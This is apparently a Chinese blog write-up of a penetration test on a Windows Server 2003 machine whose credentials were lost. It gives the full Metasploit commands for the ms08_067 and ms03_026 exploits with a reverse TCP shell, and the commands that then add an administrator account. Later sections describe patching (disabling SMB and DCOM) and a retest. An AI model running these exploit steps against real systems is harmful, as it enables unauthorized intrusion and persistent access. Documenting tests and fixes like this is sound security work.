网络系统漏洞安全攻防

              网络系统漏洞安全攻防

        

 

 

目录

一、      事件描述... 2

二、渗透测试... 3

1.查找漏洞... 3

2、渗透测试... 4

ms08_067渗透测试... 4

ms03_026渗透测试... 9

三、漏洞修复............................................................................................8

1、修复ms08_067漏洞... 13

    2、修复ms03_026漏洞................................................................ 14

四、漏洞复查... 15

1、ms08_067漏洞复查... 15

 

 

 

一、事件描述

   在对公司网络进行维护的时候,发现公司的服务器群中有一台年久失修的服务器要进行报废处理,但里面有一个重要文件,由于太长时间没人进行维护管理,主机的用户名和密码早已丢失,为了获得这个文件,需进入这台服务器。

二、渗透测试

1.查找漏洞

  首先使用metasploit内置的nmap扫描器对服务器进行详细扫描,

在msf里输入命令db_nmap -p 1-65535 -T5 -A -v 192.168.124.132

从扫描结果里可以看出,服务器一共开启了了8个端口,分别是21,135,139,445,1025,1026,1027,3389,且服务器的操作系统版本为Windows Server 2003 3790 (Windows Server 2003 5.2),smb的版本为一。

 

 2、渗透测试

  从第一步的扫描结果可以看出,服务器操作系统的版本较老,且开启了135,139,445等敏感端口,因此决定使用经典的ms08_067和ms03_026对其进行渗透测试。

ms08_067渗透测试

    因为服务开启了445端口,因此决定使用ms08_067对其进行渗透测试,在msf里输入命令useexploit/windows/smb/ms08_067_netapi进入ms08_067的渗透攻击模块。

    在msf里输入命令setpayload windows/shell/reverse_tcp设置该渗透攻击模块的攻击载荷为反弹型tcp连接

在msf里输入命令show  options查看该渗透攻击模块的详细参数

 

在msf里输入命令set  RHOST 192.168.124.132设置远程主机的IP地址为192.168.124.132

在msf里输入命令set  LHOST 192.168.124.1 设置本地主机的IP地址为192.168.124.1

在msf里输入命令 showoptions验证输入的结果

在msf里输入命令exploit开始渗透攻击,从返回的结果看,本次渗透攻击成功反弹shell。

在反弹的shell中输入命令net  user test 123456 /add 添加普通用户test。

在反弹的shell中输入命令net  localgroup  administrators test /add将test加入管理员用户组

   使用远程桌面登陆远程服务器,成功登陆,本次渗透成功完成。

ms03_026渗透测试

   因服务器开启了135端口,因此决定使用ms03_026对其进行渗透测试,在msf里输入命令use  exploit/windows/dcerpc/ms03_026进行ms03_026攻击渗透模块。

在msf里输入命令setpayload windows/shell/reverse_tcp设置该渗透攻击模块的攻击载荷为反弹型tcp连接

 

在msf里输入命令show  options查看该渗透攻击模块的详细参数

在msf里输入命令set  RHOST 192.168.124.132设置远程主机的IP地址为192.168.124.132

在msf里输入命令set  LHOST 192.168.124.1 设置本地主机的IP地址为192.168.124.1

在msf里输入命令 showoptions验证输入的结果

在msf里输入命令exploit开始渗透攻击,从返回的结果看,本次渗透攻击成功反弹shell。

在反弹的shell中输入命令net  user test 123456 /add 添加普通用户test1。

在反弹的shell中输入命令net  localgroup administrators test1 /add将test1加入管理员用户组

   使用远程桌面登陆远程服务器,成功登陆,本次渗透成功完成。

三、漏洞修复

针对上述出现的漏洞,现做如下修复

1、修复ms08_067漏洞

   因ms08_067依赖于445端口,且目前业务无需smb服务,所以决定关闭445端口,打开注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters 新建DWORD值SMBDeviceEnabled为0 

重启系统, 即可关闭445端口

2、修复ms03_026漏洞

    因ms03_026依赖于dcom服务,且目前业务无需dcom服务,所以决定关闭dcom服务。打开组件服务,在 控制台根目录\组件服务\计算机中 右键我的电脑属性,在默认属性里将“在此计算机上启用分布式COM”前的勾去掉,重启系统,即可关闭COM服务

四、漏洞复查

1、ms08_067漏洞复查

   配置ms08_067攻击模块

  

在msf中输入命令expolit开始溢出攻击,从返回的信息中可知溢出失败。

2、ms03_026漏洞复查

   配置ms03_026攻击模块

在msf中输入命令expolit开始溢出攻击,从返回的信息中可知溢出失败。

五、总结

     通过此次对服务器的渗透,成功拿回服务器中的重要文件,同时通过对服务器漏洞进行修补,提高了公司服务器的安全性。

   


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值